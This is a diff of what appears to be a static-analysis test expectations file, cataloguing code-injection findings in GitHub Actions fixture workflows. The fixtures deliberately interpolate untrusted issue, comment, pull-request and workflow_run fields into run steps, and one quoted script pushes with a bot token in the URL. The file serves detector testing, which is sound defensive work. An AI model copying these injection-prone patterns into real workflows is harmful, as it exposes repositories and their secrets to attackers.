+| .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | .github/workflows/test19.yml:119:14:122:50 | TITLE=$(gh pr view $PR_NUMBER --json "title,author,headRefName")\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:123:21:123:52 | steps.title2.outputs.title | ${{ steps.title2.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | .github/workflows/test19.yml:125:14:128:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title,author)\nTITLE=$(echo $TITLE \| jq -r '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:129:21:129:52 | steps.title3.outputs.title | ${{ steps.title3.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target |
+| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues |
+| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues |
+| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues |
+| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch |
+| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch |
+| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target |
+| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target |
+| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run |
+| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run |
 edges
 | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | |
 | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | 
@@ -697,170 +864,3 @@ nodes
 subpaths
 | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] |
 | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] |
-#select
-| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target |
-| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment |
-| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment |
-| .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action6/action.yml:216:25:216:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test28.yml:12:3:12:21 | pull_request_target | pull_request_target |
-| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | .github/workflows/test29.yml:35:18:35:54 | github.event.pull_request.body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | ${{ inputs.body }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target |
-| .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/external/ultralytics/actions/action.yaml:223:25:223:60 | github.head_ref \|\| github.ref | ${{ github.head_ref \|\| github.ref }} | .github/workflows/test29.yml:12:3:12:21 | pull_request_target | pull_request_target |
-| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues |
-| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run |
-| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run |
-| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment |
-| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment |
-| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment |
-| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target |
-| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion |
-| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion |
-| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment |
-| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment |
-| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment |
-| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/test22.yml:2:3:2:14 | workflow_run | workflow_run |
-| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:62:12:84:75 | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 
